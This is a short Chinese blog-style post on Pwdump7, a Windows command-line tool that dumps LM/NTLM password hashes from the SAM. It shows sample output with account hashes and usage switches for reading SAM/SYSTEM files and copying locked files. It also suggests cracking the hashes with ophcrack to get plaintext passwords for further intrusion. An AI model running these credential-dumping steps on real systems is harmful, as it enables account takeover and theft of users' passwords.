CMD下提取系統密碼hash的工具Pwdump7

Pwdump7能夠在CMD下提取出系統中的用戶的密碼hash (包括LM和NTLM),固然必需要有系統權限.提取出了HASH,再用ophcrack破出明文密碼,對進一步***是有很大幫助的,經我測試,在XP下是能夠成功提取出來的.這個工具須要一個DLL文件支持,壓縮包中帶的,只需放到一個文件夾中便可,用法很簡單,直接輸入

D:\>PwDump7.exe
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
url: http://www.514.es administrator:500:25FC25A0CA659E57ACEDB07452AB7A8E:6C1B3BE8D28CD3E7AB63122C8A572DDF::: guest:501:0E175C3EFF8EED1652440321FCD91E4E:2850991451071A5B7A95F2977D4AAEF0::: atarasco:1001:45C6AEEDC857A06DC595236F8F5FECAA:D0253497114C1B4CC337210F4580A716:::

用法: pwdump7.exe                              (Dump system passwords) pwdump7.exe -s <samfile> <systemfile>    (Dump passwords from files) pwdump7.exe -d <filename> [destionation] (Copy filename to destionation) pwdump7.exe -h                           (Show this help) -s 是從一個sam文件中提取hash,這個文件在%systemroot%\config\sam,這裏. -d 是把一個文件複製到另外一個位置,D:\>PwDump7.exe -d c:\pagefile.sys pagefile.dmp 從這個例子中能夠看出,他的特別之處在於,能夠把進程正在佔用的文件複製成功.